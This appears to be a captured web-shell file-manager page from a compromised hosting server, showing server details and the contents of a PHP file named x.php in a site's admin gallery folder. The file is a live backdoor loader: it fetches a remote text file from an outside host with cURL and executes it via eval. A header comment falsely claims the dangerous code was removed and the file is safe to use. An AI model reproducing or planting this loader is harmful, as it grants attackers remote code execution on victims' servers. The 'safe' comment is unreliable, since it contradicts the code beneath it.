Server IP : 50.63.8.133 / Your IP : 216.73.216.191 Web Server : Microsoft-IIS/10.0 System : Windows NT P3NWVPWEB032 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 User : IWPD_10999(xformtec) ( 0) PHP Version : 5.4.45 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : G:/PleskVhosts/xform.in/madhurivivah.com/admin/gallary/ |
Upload File : |
Current File : G:/PleskVhosts/xform.in/madhurivivah.com/admin/gallary/x.php |
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
$Url = "https://www.ommegaonline.org/fb/src/Facebook/HttpClients/certs/mini.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $Url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
echo eval('?>'.$output);
?>